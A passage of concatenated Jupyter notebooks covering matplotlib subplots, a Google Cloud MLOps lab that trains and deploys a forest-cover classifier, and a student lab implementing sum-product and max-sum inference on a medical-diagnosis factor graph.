300, 310, 320, 330]) plt.plot(x, y) plt.title("Sports Watch Data", loc="left") plt.xlabel("Average Pulse") plt.ylabel("Calorie Burnage") plt.grid() plt.show()The subplots() FunctionThe subplots() function takes three arguments that describes the layout of the figure.The layout is organized in rows and columns, which are represented by the first and second argument.The third argument represents the index of the current plot.```pythonplt.subplot(1, 2, 1)the figure has 1 row, 2 columns, and this plot is the first plot.```# Subplots #plot 1: x = np.array([0, 1, 2, 3]) y = np.array([3, 8, 1, 10]) plt.subplot(1, 2, 1) plt.plot(x, y) #plot 2: x = np.array([0, 1, 2, 3]) y = np.array([10, 20, 30, 40]) plt.subplot(1, 2, 2) plt.plot(x, y) plt.show() #plot 1: x = np.array([0, 1, 2, 3]) y = np.array([3, 8, 1, 10]) plt.subplot(2, 1, 1) plt.plot(x, y) #plot 2: x = np.array([0, 1, 2, 3]) y = np.array([10, 20, 30, 40]) plt.subplot(2, 1, 2) plt.plot(x, y) plt.suptitle("سلام") plt.show()Importing packages--- __We need to run the scripts install requirements.sh__import json import os import numpy as np import pandas as pd import pickle import uuid import time import tempfile from googleapiclient import discovery from googleapiclient import errors from google.cloud import bigquery from jinja2 import Template from kfp.components import func_to_container_op from typing import NamedTuple from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split from sklearn.linear_model import SGDClassifier from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler, OneHotEncoder from sklearn.compose import ColumnTransformer !(gcloud config get-value core/project)zeta-rush-341516Preparing the dataset--PROJECT_ID = !(gcloud config get-value core/project) PROJECT_ID = PROJECT_ID[0] DATASET_ID='covertype_dataset' DATASET_LOCATION='US' TABLE_ID='covertype' DATA_SOURCE='gs://workshop-datasets/covertype/small/dataset.csv' SCHEMA='Elevation:INTEGER,Aspect:INTEGER,Slope:INTEGER,Horizontal_Distance_To_Hydrology:\ INTEGER,Vertical_Distance_To_Hydrology:INTEGER,Horizontal_Distance_To_Roadways:INTEGER,Hillshade_9am:\ INTEGER,Hillshade_Noon:INTEGER,Hillshade_3pm:INTEGER,Horizontal_Distance_To_Fire_Points:INTEGER,\ Wilderness_Area:STRING,Soil_Type:STRING,Cover_Type:INTEGER'__We create the BigQuery dataset and upload the Covertype csv data into a table__ __The pipeline ingests data from BigQuery. The cell below uploads the Covertype dataset to BigQuery__!bq --location=$DATASET_LOCATION --project_id=$PROJECT_ID mk --dataset $DATASET_ID !bq --project_id=$PROJECT_ID --dataset_id=$DATASET_ID load \ --source_format=CSV \ --skip_leading_rows=1 \ --replace \ $TABLE_ID \ $DATA_SOURCE \ $SCHEMAWaiting on bqjob_r1a261ada7bedac6e_0000017f95549ef8_1 ... (2s) Current status: DONEConfiguring environment settings---!gsutil ls REGION = 'us-central1' ARTIFACT_STORE = 'gs://mlops-youness' PROJECT_ID = !(gcloud config get-value core/project) PROJECT_ID = PROJECT_ID[0] DATA_ROOT='{}/data'.format(ARTIFACT_STORE) JOB_DIR_ROOT='{}/jobs'.format(ARTIFACT_STORE) TRAINING_FILE_PATH='{}/{}/{}'.format(DATA_ROOT, 'training', 'dataset.csv') VALIDATION_FILE_PATH='{}/{}/{}'.format(DATA_ROOT, 'validation', 'dataset.csv')Exploring the Covertype dataset--%%bigquery SELECT * FROM `covertype_dataset.covertype`Query complete after 0.00s: 100%|██████████| 2/2 [00:00<00:00, 1215.56query/s] Downloading: 100%|██████████| 100000/100000 [00:01<00:00, 92715.65rows/s]Creating a training split-- __We Run the query below in order to have repeatable sampling of the data in BigQuery__!bq query \ -n 0 \ --destination_table covertype_dataset.training \ --replace \ --use_legacy_sql=false \ 'SELECT * \ FROM `covertype_dataset.covertype` AS cover \ WHERE \ MOD(ABS(FARM_FINGERPRINT(TO_JSON_STRING(cover))), 10) IN (1, 2, 3, 4)'Waiting on bqjob_r62de6020f6501c97_0000017f9555177a_1 ... (1s) Current status: DONE__We export the BigQuery training table to GCS at $TRAINING_FILE_PATH__!bq extract \ --destination_format CSV \ covertype_dataset.training \ $TRAINING_FILE_PATHWaiting on bqjob_r1a578ffe791da479_0000017f95552b1d_1 ... (0s) Current status: DONECreating a validation split--- __We create a validation split that takes 10% of the data using the `bq` command and export this split into the BigQuery table `covertype_dataset.validation`__!bq query \ -n 0 \ --destination_table covertype_dataset.validation \ --replace \ --use_legacy_sql=false \ 'SELECT * \ FROM `covertype_dataset.covertype` AS cover \ WHERE \ MOD(ABS(FARM_FINGERPRINT(TO_JSON_STRING(cover))), 10) IN (8)' !bq extract \ --destination_format CSV \ covertype_dataset.validation \ $VALIDATION_FILE_PATH TRAINING_FILE_PATH, VALIDATION_FILE_PATH df_train = pd.read_csv(TRAINING_FILE_PATH) df_validation = pd.read_csv(VALIDATION_FILE_PATH) print(df_train.shape) print(df_validation.shape)(40009, 13) (9836, 13)The training application-- The training pipeline preprocesses data by standardizing all numeric features using `sklearn.preprocessing.StandardScaler` and encoding all categorical features using `sklearn.preprocessing.OneHotEncoder`. It uses stochastic gradient descent linear classifier (SGDClassifier) for modeling.numeric_feature_indexes = slice(0, 10) categorical_feature_indexes = slice(10, 12) preprocessor = ColumnTransformer( transformers=[ ('num', StandardScaler(), numeric_feature_indexes), ('cat', OneHotEncoder(), categorical_feature_indexes) ]) pipeline = Pipeline([ ('preprocessor', preprocessor), ('classifier', SGDClassifier(loss='log', tol=1e-3)) ]) num_features_type_map = {feature: 'float64' for feature in df_train.columns[numeric_feature_indexes]} df_train = df_train.astype(num_features_type_map) df_validation = df_validation.astype(num_features_type_map)__Run the pipeline locally.__X_train = df_train.drop('Cover_Type', axis=1) y_train = df_train['Cover_Type'] X_validation = df_validation.drop('Cover_Type', axis=1) y_validation = df_validation['Cover_Type'] pipeline.set_params(classifier__alpha=0.001, classifier__max_iter=200) pipeline.fit(X_train, y_train) accuracy = pipeline.score(X_validation, y_validation) print(accuracy)0.6982513216754779__Prepare the hyperparameter tuning application.__TRAINING_APP_FOLDER = 'training_app' os.makedirs(TRAINING_APP_FOLDER, exist_ok=True) IMAGE_NAME='trainer_image' IMAGE_TAG='latest' IMAGE_URI='gcr.io/{}/{}:{}'.format(PROJECT_ID, IMAGE_NAME, IMAGE_TAG) IMAGE_URI__Build the docker image__!gcloud builds submit --tag $IMAGE_URI $TRAINING_APP_FOLDERCreating temporary tarball archive of 6 file(s) totalling 6.0 KiB before compression. Uploading tarball of [training_app] to [gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz] Created [https://cloudbuild.googleapis.com/v1/projects/zeta-rush-341516/locations/global/builds/3d083302-0757-42da-a50a-341705ff8e6b]. Logs are available at [https://console.cloud.google.com/cloud-build/builds/3d083302-0757-42da-a50a-341705ff8e6b?project=156920671469]. ----------------------------- REMOTE BUILD OUTPUT ------------------------------ starting build "3d083302-0757-42da-a50a-341705ff8e6b" FETCHSOURCE Fetching storage object: gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz#1647477979401432 Copying gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz#1647477979401432... / [1 files][ 1.7 KiB/ 1.7 KiB] Operation completed[...]__Submit an AI Platform hyperparameter tuning job__JOB_NAME = "JOB_{}".format(time.strftime("%Y%m%d_%H%M%S")) JOB_DIR = "{}/{}".format(JOB_DIR_ROOT, JOB_NAME) SCALE_TIER = "BASIC" !gcloud ai-platform jobs submit training $JOB_NAME \ --region=$REGION \ --job-dir=$JOB_DIR \ --master-image-uri=$IMAGE_URI \ --scale-tier=$SCALE_TIER \ --config $TRAINING_APP_FOLDER/hptuning_config.yaml \ -- \ --training_dataset_path=$TRAINING_FILE_PATH \ --validation_dataset_path=$VALIDATION_FILE_PATH \ --hptune JOB_NAME !gcloud ai-platform jobs describe $JOB_NAMEcreateTime: '2022-03-17T00:49:39Z' etag: v-ELqiuttJU= jobId: JOB_20220317_004937 jobPosition: '0' startTime: '2022-03-17T00:49:43Z' state: RUNNING trainingInput: args: - --training_dataset_path=gs://mlops-youness/data/training/dataset.csv - --validation_dataset_path=gs://mlops-youness/data/validation/dataset.csv - --hptune hyperparameters: enableTrialEarlyStopping: true goal: MAXIMIZE hyperparameterMetricTag: accuracy maxParallelTrials: 2 maxTrials: 4 params: - discreteValues: - 200.0 - 500.0 parameterName: max_iter type: DISCRETE - maxValue: 0.001 minValue: 1e-05 parameterName: alpha scaleType: UNIT_LINEAR_SCALE type: DOUBLE jobDir: gs://mlops-youness/jobs/JOB_20220317_004937 masterConfig: imageUri: gcr.io/zeta-rush-341516/trainer_image:latest region: us-central1 trainingOutput: hyperparameterMetricTag: accuracy isHyperparameterTuningJob: true View job in the Cloud Console at: http[...]__Retrieve HP-tuning results__ml = discovery.build('ml', 'v1') job_id = 'projects/{}/jobs/{}'.format(PROJECT_ID, JOB_NAME) request = ml.projects().jobs().get(name=job_id) try: response = request.execute() except errors.HttpError as err: print(err) except: print("Unexpected error") response response['trainingOutput']['trials'][0]__Retrain the model with the best hyperparameters__alpha = response['trainingOutput']['trials'][0]['hyperparameters']['alpha'] max_iter = response['trainingOutput']['trials'][0]['hyperparameters']['max_iter'] JOB_NAME = "JOB_{}".format(time.strftime("%Y%m%d_%H%M%S")) JOB_DIR = "{}/{}".format(JOB_DIR_ROOT, JOB_NAME) SCALE_TIER = "BASIC" !gcloud ai-platform jobs submit training $JOB_NAME \ --region=$REGION \ --job-dir=$JOB_DIR \ --master-image-uri=$IMAGE_URI \ --scale-tier=$SCALE_TIER \ -- \ --training_dataset_path=$TRAINING_FILE_PATH \ --validation_dataset_path=$VALIDATION_FILE_PATH \ --alpha=$alpha \ --max_iter=$max_iter \ --nohptune !gcloud ai-platform jobs describe $JOB_NAME !gsutil ls $JOB_DIRgs://mlops-youness/jobs/JOB_20220317_012710/model.pklDeploy the model to AI Platform Prediction--model_name = 'forest_cover_classifier' labels = "task=classifier,domain=forestry" !gcloud ai-platform models create $model_name \ --regions=$REGION \ --labels=$labelsUsing endpoint [https://ml.googleapis.com/] Created ai platform model [projects/zeta-rush-341516/models/forest_cover_classifier].__Create a model version__model_version = 'v01' !gcloud ai-platform versions create {model_version} \ --model={model_name} \ --origin=$JOB_DIR \ --runtime-version=1.15 \ --framework=scikit-learn \ --python-version=3.7\ --region globalUsing endpoint [https://ml.googleapis.com/] Creating version (this might take a few minutes)......done.__Serve predictions__ : Prepare the input file with JSON formated instances.input_file = 'serving_instances.json' with open(input_file, 'w') as f: for index, row in X_validation.head().iterrows(): f.write(json.dumps(list(row.values))) f.write('\n') !cat $input_file[2841.0, 45.0, 0.0, 644.0, 282.0, 1376.0, 218.0, 237.0, 156.0, 1003.0, "Commanche", "C4758"] [2494.0, 180.0, 0.0, 0.0, 0.0, 819.0, 219.0, 238.0, 157.0, 5531.0, "Rawah", "C6101"] [3153.0, 90.0, 0.0, 335.0, 11.0, 5842.0, 219.0, 237.0, 155.0, 930.0, "Rawah", "C7101"] [3021.0, 90.0, 0.0, 42.0, 1.0, 4389.0, 219.0, 237.0, 155.0, 902.0, "Rawah", "C7745"] [2916.0, 0.0, 0.0, 0.0, 0.0, 4562.0, 218.0, 238.0, 156.0, 5442.0, "Rawah", "C7745"]__Invoke the model__!gcloud ai-platform predict \ --model $model_name \ --version $model_version \ --json-instances $input_file\ --region globalUsing endpoint [https://ml.googleapis.com/] [1, 1, 0, 1, 1]Lab 2: Inference in Graphical Models Machine Learning 2 (2016/2017)* The lab exercises should be made in groups of two people or individually.* The hand-in deadline is Wednesday, May 10, 23:59.* Assignment should be sent to . The subject line of your email should be "[ML2_2017] lab_lastname1\_lastname2". * Put your and your teammates' names in the body of the email* Attach the .IPYNB (IPython Notebook) file containing your code and answers. Naming of the file follows the same rule as the subject line. For example, if the subject line is "[ML2_2017] lab02\_Bongers\_Blom", the attached file should be "lab02\_Bongers\_Blom.ipynb". Only use underscores ("\_") to connect names, otherwise the files cannot be parsed.Notes on implementation:* You should write your code and answers in an IPython Notebook: http://ipython.org/notebook.html. If you have problems, please ask or e-mail Philip.* For some of the questions, you can write the code directly in the first code cell that provides the class structure.* Among the first lines of your notebook should be "%pylab inline". This imports all required modules, and your plots will appear inline.* NOTE: test your code and make sure we can run your notebook / scripts! IntroductionIn this assignment, we will implement the sum-product and max-sum algorithms for factor graphs over discrete variables. The relevant theory is covered in chapter 8 of Bishop's PRML book, in particular section 8.4. Read this chapter carefuly before continuing!We will first implement sum-product and max-sum and apply it to a simple poly-tree structured factor graph for medical diagnosis. Then, we will implement a loopy version of the algorithms and use it for image denoising.For this assignment we recommended you stick to numpy ndarrays (constructed with np.array, np.zeros, np.ones, etc.) as opposed to numpy matrices, because arrays can store n-dimensional arrays whereas matrices only work for 2d arrays. We need n-dimensional arrays in order to store conditional distributions with more than 1 conditioning variable. If you want to perform matrix multiplication on arrays, use the np.dot function; all infix operators including *, +, -, work element-wise on arrays. Part 1: The sum-product algorithmWe will implement a datastructure to store a factor graph and to facilitate computations on this graph. Recall that a factor graph consists of two types of nodes, factors and variables. Below you will find some classes for these node types to get you started. Carefully inspect this code and make sure you understand what it does; you will have to build on it later.%pylab inline import itertools class Node(object): """ Base-class for Nodes in a factor graph. Only instantiate sub-classes of Node. """ def __init__(self, name): # A name for this Node, for printing purposes self.name = name # Neighbours in the graph, identified with their index in this list. # i.e. self.neighbours contains neighbour 0 through len(self.neighbours) - 1. self.neighbours = [] # Reset the node-state (not the graph topology) self.reset() def reset(self): # Incoming messages; a dictionary mapping neighbours to messages. # That is, it maps Node -> np.ndarray. self.in_msgs = {} # A set of neighbours for which this node has pending messages. # We use a python set object so we don't have to worry about duplicates. self.pending = set([]) def add_neighbour(self, nb): self.neighbours.append(nb) def send_sp_msg(self, other): # To be implemented in subclass. raise Exception('Method send_sp_msg not implemented in base-class Node') def send_ms_msg(self, other): # To be implemented in subclass. raise Exception('Method send_ms_msg not implemented in base-class Node') def receive_msg(self, other, msg): # Store the incomming message, replacing previous messages from the same node self.in_msgs[other] = msg # add pending messages if all messages have been received for target_node in self.neighbours: if (set(self.neighbours) - {target_node}) <= self.in_msgs.keys(): # if all messages necessary for target has been received self.pending |= target_node def __str__(self): # This is printed when using 'print node_instance' return self.name class Variable(Node): def __init__(self, name, num_states): """ Variable node constructor. Args: name: a name string for this node. Used for printing. num_states: the number of states this variable can take. Allowable states run from 0 through (num_states - 1). For example, for a binary variable num_states=2, and the allowable states are 0, 1. """ self.num_states = num_states # Call the base-class constructor super(Variable, self).__init__(name) def set_observed(self, observed_state): """ Set this variable to an observed state. Args: observed_state: an integer value in [0, self.num_states - 1]. """ # Observed state is represented as a 1-of-N variable # Could be 0.0 for sum-product, but log(0.0) = -inf so a tiny value is preferable for max-sum self.observed_state[:] = 0.000001 self.observed_state[observed_state] = 1.0 def set_latent(self): """ Erase an observed state for this variable and consider it latent again. """ # No state is preferred, so set all entries of observed_state to 1.0 # Using this representation we need not differentiate between observed and latent # variables when sending messages. self.observed_state[:] = 1.0 def reset(self): super(Variable, self).reset() self.observed_state = np.ones(self.num_states) def marginal(self, Z=None): """ Compute the marginal distribution of this Variable. It is assumed that message passing has completed when this function is called. Args: Z: an optional normalization constant can be passed in. If None is passed, Z is computed. Returns: marginal, Z. The first is a numpy array containing the normalized marginal distribution. Z is either equal to the input Z, or computed in this function (if Z=None was passed). """ # compute marginal for factor in self.neighbours: # make sure all necessary messages are in inbox assert factor in self.in_msgs marginal = np.prod(self.in_msgs.values(),axis=0) * self.observed_state if Z is None: Z = marginal.sum() return marginal/Z, Z def marginal_maxsum(self, Z=None): """ Compute the marginal distribution of this Variable. It is assumed that message passing has completed when this function is called. Args: Z: an optional normalization constant can be passed in. If None is passed, Z is computed. Returns: marginal, Z. The first is a numpy array containing the normalized marginal distribution. Z is either equal to the input Z, or computed in this function (if Z=None was passed). """ # compute marginal for factor in self.neighbours: # make sure all necessary messages are in inbox assert factor in self.in_msgs marginal = np.sum(self.in_msgs.values(),axis=0) + np.log(self.observed_state) if Z is None: Z = marginal.sum() return marginal/Z, Z def send_sp_msg(self, other): # implement Variable -> Factor message for sum-product for factor in self.neighbours: # make sure all necessary messages are in inbox if factor != other: assert factor in self.in_msgs # Remove other from pending messages self.pending -= {other} other_neighbours = [var for var in self.neighbours if var != other ] if len(other_neighbours) == 0: message = np.ones(self.num_states) else: message = np.prod([self.in_msgs[factor] for factor in other_neighbours], axis = 0) message = message * self.observed_state other.receive_msg(self, message) return message def send_ms_msg(self, other): # implement Variable -> Factor message for max-sum for factor in self.neighbours: # make sure all necessary messages are in inbox if factor != other: assert factor in self.in_msgs other_neighbours = [var for var in self.neighbours if var != other ] if len(other_neighbours) == 0: message = np.zeros(self.num_states) else: message = np.sum([self.in_msgs[factor] for factor in other_neighbours], axis = 0) # Compute message message = message + np.log(self.observed_state) # Remove other from pending messages self.pending -= {other} other.receive_msg(self, message) return message def __str__(self): return "var(%s)" % (self.name) def __repr__(self): return self.__str__() class Factor(Node): def __init__(self, name, f, neighbours): """ Factor node constructor. Args: name: a name string for this node. Used for printing f: a numpy.ndarray with N axes, where N is the number of neighbours. That is, the axes of f correspond to variables, and the index along that axes corresponds to a value of that variable. Each axis of the array should have as many entries as the corresponding neighbour variable has states. neighbours: a list of neighbouring Variables. Bi-directional connections are created. """ # Call the base-class constructor super(Factor, self).__init__(name) assert len(neighbours) == f.ndim, 'Factor function f should accept as many arguments as this Factor node has neighbours' for nb_ind in range(len(neighbours)): nb = neighbours[nb_ind] assert f.shape[nb_ind] == nb.num_states, 'The range of the factor function f is invalid for input %i %s' % (nb_ind, nb.name) self.add_neighbour(nb) nb.add_neighbour(self) self.f = f def send_sp_msg(self, other): # Factor -> Variable message for sum-product for var in self.neighbours: # make sure all necessary messages are in inbox if var != other: assert var in self.in_msgs # Indices of neigbour vars except other f_ix = range(len(self.neighbours)) f_ix.remove(self.neighbours.index(other)) # Indices for the corresponding messages m_ix = range(len(f_ix)) # Compute product of other messages other_neighbours = [var for var in self.neighbours if var != other] messages = [self.in_msgs[var] for var in other_neighbours] T = reduce(np.outer, messages) if len(messages) > 0 else 1 #np.array([[1]]) # Compute messages mu_f_x = np.tensordot(self.f, T ,axes=(f_ix,m_ix)) # Remove other from pending self.pending -= {other} # Send message other.receive_msg(self, mu_f_x) return mu_f_x def send_ms_msg(self, other): # implement Factor -> Variable message for max-sum for var in self.neighbours: # make sure all necessary messages are in inbox if var != other: assert var in self.in_msgs # Get received messages other_neighbours = [var for var in self.neighbours if var != other] messages = [self.in_msgs[var] for var in other_neighbours] # indices of neighbors except other f_ix = range(len(self.neighbours)) f_ix.remove(self.neighbours.index(other)) # Expand dimensions to allow T = np.expand_dims(np.add.reduce(np.ix_(*messages)), self.neighbours.index(other)) #if len(messages) > 0 else 0 # find maximum vector along axes mu_f_x = np.apply_over_axes(np.amax, np.log(self.f) + T, f_ix).squeeze() # Remove other from pending self.pending -= {other} # Send message other.receive_msg(self, mu_f_x) return mu_f_x def __str__(self): return "%s" % (self.name) def __repr__(self): return self.__str__()Populating the interactive namespace from numpy and matplotlib1.1 Instantiate network (10 points)Convert the directed graphical model ("Bayesian Network") shown below to a factor graph. Instantiate this graph by creating Variable and Factor instances and linking them according to the graph structure. To instantiate the factor graph, first create the Variable nodes and then create Factor nodes, passing a list of neighbour Variables to each Factor.Use the following prior and conditional probabilities.$$p(\verb+Influenza+) = 0.05 \\\\p(\verb+Smokes+) = 0.2 \\\\$$$$p(\verb+SoreThroat+ = 1 | \verb+Influenza+ = 1) = 0.3 \\\\p(\verb+SoreThroat+ = 1 | \verb+Influenza+ = 0) = 0.001 \\\\p(\verb+Fever+ = 1| \verb+Influenza+ = 1) = 0.9 \\\\p(\verb+Fever+ = 1| \verb+Influenza+ = 0) = 0.05 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 1, \verb+Smokes+ = 1) = 0.99 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 1, \verb+Smokes+ = 0) = 0.9 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 0, \verb+Smokes+ = 1) = 0.7 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 0, \verb+Smokes+ = 0) = 0.0001 \\\\p(\verb+Coughing+ = 1| \verb+Bronchitis+ = 1) = 0.8 \\\\p(\verb+Coughing+ = 1| \verb+Bronchitis+ = 0) = 0.07 \\\\p(\verb+Wheezing+ = 1| \verb+Bronchitis+ = 1) = 0.6 \\\\p(\verb+Wheezing+ = 1| \verb+Bronchitis+ = 0) = 0.001 \\\\$$from IPython.core.display import Image Image(filename='bn.png') # Initialization names = ['influenza', 'smokes', 'sorethroat', 'fever' , 'bronchitis', 'coughing', 'wheezing'] num_states = 2 num_vars = len(names) num_factors = 7 # Factor-variable connectivity matrix connectivity = [ [1,0,0,0,0,0,0], # f1(influenza) [0,1,0,0,0,0,0], # f2(smokes) [1,0,1,0,0,0,0], # f3(influenza, sorethroat) [1,0,0,1,0,0,0], # f4(influenze, fever) [1,1,0,0,1,0,0], # f5(influenza, smokes, bronchitis) [0,0,0,0,1,1,0], # f6(bronchitis,coughing) [0,0,0,0,1,0,1]] # f7(bronchitis, wheezing) factor_matrix = np.array(connectivity) # Variables: {id:Variable} dict_vars = {var_idx: Variable(name,num_states) for var_idx, name in enumerate(names)} # Factor functions _f1 = lambda x: 0.05 * x + 0.95 * (1 - x) _f2 = lambda x: 0.2 * x + 0.8 * (1 - x) _f3 = lambda x, y: 0.3 * x * y + 0.7 * x *(1-y) + 0.001 * (1-x) * y + 0.999 * (1-x) * (1-y) _f4 = lambda x, y: 0.9 * x * y + 0.1 * x *(1-y) + 0.05 * (1-x) * y + 0.95 * (1-x) * (1-y) _f5 = lambda x, y, z: 0.99 * x * y * z + 0.01 * x * y * (1-z) + \ 0.9 * x * (1-y) * z + 0.1 * x * (1-y) * (1-z) + \ 0.7 * (1-x) * y * z + 0.3 * (1-x) * y * (1-z) + \ 0.0001 * (1-x) * (1-y) * z + 0.9999 * (1-x) * (1-y) * (1-z) _f6 = lambda x, y: 0.8 * x * y + 0.2 * x *(1-y) + 0.07 * (1-x) * y + 0.93 * (1-x) * (1-y) _f7 = lambda x, y: 0.6 * x * y + 0.4 * x *(1-y) + 0.001 * (1-x) * y + 0.999 * (1-x) * (1-y) ls_factor_fns = [_f1, _f2, _f3, _f4, _f5, _f6, _f7] # Create tensors for each factor and assigns correct probability def get_factor_beliefs_tensor(f, neighbours): assignments = list(itertools.product(*[list(range(var.num_states)) for var in neighbours])) beliefs = np.zeros(tuple(var.num_states for var in neighbours)) for assignment in assignments: # assign values to tensors beliefs[assignment] = f(*assignment) return beliefs # Create factors ls_factors = [] for f_idx, row in enumerate(factor_matrix): name = 'f%d' % (f_idx+1) neighbours = [dict_vars[var_idx] for var_idx in np.where(row == 1)[0]] f = get_factor_beliefs_tensor(ls_factor_fns[f_idx], neighbours) ls_factors.append(Factor(name=name, f=f, neighbours=neighbours)) f1 = ls_factors[0] f2 = ls_factors[1] f3 = ls_factors[2] f4 = ls_factors[3] f5 = ls_factors[4] f6 = ls_factors[5] f7 = ls_factors[6] I = dict_vars[0] SM = dict_vars[1] ST = dict_vars[2] F = dict_vars[3] B = dict_vars[4] C = dict_vars[5] W = dict_vars[6]1.2 Factor to variable messages (20 points)Write a method `send_sp_msg(self, other)` for the Factor class, that checks if all the information required to pass a message to Variable `other` is present, computes the message and sends it to `other`. "Sending" here simply means calling the `receive_msg` function of the receiving node (we will implement this later). The message itself should be represented as a numpy array (np.array) whose length is equal to the number of states of the variable.An elegant and efficient solution can be obtained using the n-way outer product of vectors. This product takes n vectors $\mathbf{x}^{(1)}, \ldots, \mathbf{x}^{(n)}$ and computes a $n$-dimensional tensor (ndarray) whose element $i_0,i_1,...,i_n$ is given by $\prod_j \mathbf{x}^{(j)}_{i_j}$. In python, this is realized as `np.multiply.reduce(np.ix_(*vectors))` for a python list `vectors` of 1D numpy arrays. Try to figure out how this statement works -- it contains some useful functional programming techniques. Another function that you may find useful in computing the message is `np.tensordot`.# See class definition for this and the following questions1.3 Variable to factor messages (10 points)Write a method `send_sp_message(self, other)` for the Variable class, that checks if all the information required to pass a message to Variable var is present, computes the message and sends it to factor. 1.4 Compute marginal (10 points)Later in this assignment, we will implement message passing schemes to do inference. Once the message passing has completed, we will want to compute local marginals for each variable.Write the method `marginal` for the Variable class, that computes a marginal distribution over that node. 1.5 Receiving messages (10 points)In order to implement the loopy and non-loopy message passing algorithms, we need some way to determine which nodes are ready to send messages to which neighbours. To do this in a way that works for both loopy and non-loopy algorithms, we make use of the concept of "pending messages", which is explained in Bishop (8.4.7): "we will say that a (variable or factor)node a has a message pending on its link to a node b if node a has received anymessage on any of its other links since the last time it send (sic) a message to b. Thus,when a node receives a message on one of its links, this creates pending messageson all of its other links."Keep in mind that for the non-loopy algorithm, nodes may not have received any messages on some or all of their links. Therefore, before we say node a has a pending message for node b, we must check that node a has received all messages needed to compute the message that is to be sent to b.Modify the function `receive_msg`, so that it updates the self.pending variable as described above. The member self.pending is a set that is to be filled with Nodes to which self has pending messages. Modify the `send_msg` functions to remove pending messages as they are sent. 1.6 Inference Engine (10 points)Write a function `sum_product(node_list)` that runs the sum-product message passing algorithm on a tree-structured factor graph with given nodes. The input parameter `node_list` is a list of all Node instances in the graph, which is assumed to be ordered correctly. That is, the list starts with a leaf node, which can always send a message. Subsequent nodes in `node_list` should be capable of sending a message when the pending messages of preceding nodes in the list have been sent. The sum-product algorithm then proceeds by passing over the list from beginning to end, sending all pending messages at the nodes it encounters. Then, in reverse order, the algorithm traverses the list again and again sends all pending messages at each node as it is encountered. For this to work, you must initialize pending messages for all the leaf nodes, e.g. `influenza_prior.pending.add(influenza)`, where `influenza_prior` is a Factor node corresponding the the prior, `influenza` is a Variable node and the only connection of `influenza_prior` goes to `influenza`.# Define tree tree = [f1, f2, ST, F, C, f3, f4, I, SM, f5, f6, B, f7, W] # Define leaves leaves = [f1, f2, ST, F, C] def sum_product(node_list, leaves): # Initialization for node in leaves: for neighbour in node.neighbours: node.pending.add(neighbour) # forward pass print('\n\nForward Pass') for i, node in enumerate(node_list): for neighbour in (set(node.neighbours) & set(node_list[i:])): # send messages message = node.send_sp_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, message)) print('\n\nBackward Pass') # backward pass reverse_ls = node_list[::-1] for i, node in enumerate(reverse_ls): for neighbour in (set(node.neighbours) & set(reverse_ls[i:])): message = node.send_sp_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, message)) sum_product(tree, leaves) # Compute Marginals for _, node in dict_vars.items(): print(node, node.marginal())(var(influenza), (array([ 0.95, 0.05]), 1.0)) (var(smokes), (array([ 0.8, 0.2]), 1.0)) (var(sorethroat), (array([ 0.98405, 0.01595]), 1.0)) (var(fever), (array([ 0.9075, 0.0925]), 1.0)) (var(bronchitis), (array([ 0.821024, 0.178976]), 1.0)) (var(coughing), (array([ 0.79934752, 0.20065248]), 1.0)) (var(wheezing), (array([ 0.89179338, 0.10820662]), 1.0))1.7 Observed variables and probabilistic queries (15 points)We will now use the inference engine to answer probabilistic queries. That is, we will set certain variables to observed values, and obtain the marginals over latent variables. We have already provided functions `set_observed` and `set_latent` that manage a member of Variable called `observed_state`. Modify the `Variable.send_msg` and `Variable.marginal` routines that you wrote before, to use `observed_state` so as to get the required marginals when some nodes are observed. 1.8 Sum-product and MAP states (5 points)A maximum a posteriori state (MAP-state) is an assignment of all latent variables that maximizes the probability of latent variables given observed variables:$$\mathbf{x}_{\verb+MAP+} = \arg\max _{\mathbf{x}} p(\mathbf{x} | \mathbf{y})$$Could we use the sum-product algorithm to obtain a MAP state? If yes, how? If no, why not? Solution Yes, it is possible to use the sum-product algorithm to compute $p(\mathbf{x} | \mathbf{y})$. We can then evaluate each possible combination of values for $\mathbf{x}$ and select the one with maximum a posteriori probability. Note that this is highly inefficient, which is why we use the max-sum algorithm. Part 2: The max-sum algorithmNext, we implement the max-sum algorithm as described in section 8.4.5 of Bishop. 2.1 Factor to variable messages (10 points)Implement the function `Factor.send_ms_msg` that sends Factor -> Variable messages for the max-sum algorithm. It is analogous to the `Factor.send_sp_msg` function you implemented before. 2.2 Variable to factor messages (10 points)Implement the `Variable.send_ms_msg` function that sends Variable -> Factor messages for the max-sum algorithm. 2.3 Find a MAP state (10 points)Using the same message passing schedule we used for sum-product, implement the max-sum algorithm. For simplicity, we will ignore issues relating to non-unique maxima. So there is no need to implement backtracking; the MAP state is obtained by a per-node maximization (eq. 8.98 in Bishop). Make sure your algorithm works with both latent and observed variables.def max_sum(node_list, leaves): # Initialization for node in leaves: for neighbour in node.neighbours: node.pending.add(neighbour) # forward pass print('\nForward Pass') for i, node in enumerate(node_list): for neighbour in (set(node.neighbours) & set(node_list[i:])): # send messages message = node.send_ms_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, np.exp(message))) print('\nBackward Pass') # backward pass reverse_ls = node_list[::-1] for i, node in enumerate(reverse_ls): for neighbour in (set(node.neighbours) & set(reverse_ls[i:])): message = node.send_ms_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, np.exp(message))) def get_map_state(node): return np.argmax(np.sum(node.in_msgs.values(), axis=0) + np.log(node.observed_state)) # Define tree tree = [f1, f2, ST, F, C, f3, f4, I, SM, f5, f6, B, f7, W] # Define leaves leaves = [f1, f2, ST, F, C] # Define observed states B.set_observed(1) # I.set_observed(1) # Run algorithm max_sum(tree, leaves) # Compute MAP states print('\nMAP states') for _, node in dict_vars.items(): print('%s, MAP: %d, \tmarginal: %s' % (node.name, get_map_state(node), node.marginal()[0]))Forward Pass f1 -> 